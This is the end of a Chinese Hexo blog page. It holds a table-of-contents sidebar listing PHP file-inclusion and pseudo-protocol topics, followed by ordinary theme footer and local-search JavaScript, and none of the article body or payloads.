class="nav-item nav-level-3"><a class="nav-link" href="#伪协议"><span class="nav-number">8.</span> <span class="nav-text">伪协议</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#File"><span class="nav-number">8.1.</span> <span class="nav-text">File://</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#data"><span class="nav-number">8.2.</span> <span class="nav-text">data://</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#phar"><span class="nav-number">8.3.</span> <span class="nav-text">phar://</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#zip-–-zlib-–bzip2-–zip"><span class="nav-number">8.4.</span> <span class="nav-text">zip:// – zlib:// –bzip2:// –zip://</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#另一种思路："><span class="nav-number">8.4.1.</span> <span class="nav-text">另一种思路：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PHP-input"><span class="nav-number">8.5.</span> <span class="nav-text">PHP://input</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#php-output"><span class="nav-number">8.6.</span> <span class="nav-text">php://output</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#php-filter"><span class="nav-number">8.7.</span> <span class="nav-text">php://filter</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#目录遍历"><span class="nav-number">8.8.</span> <span class="nav-text">目录遍历</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#编码绕过"><span class="nav-number">8.9.</span> <span class="nav-text">编码绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用协议"><span class="nav-number">8.10.</span> <span class="nav-text">利用协议</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#变量覆盖"><span class="nav-number"></span> <span class="nav-text">变量覆盖</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文件包含修复方案"><span class="nav-number"></span> <span class="nav-text">文件包含修复方案</span></a></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart" id="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guolala</span>

  

  
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v6.5.0</div>


-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
  </script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
        
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="true"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  
  

  

  

  

  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>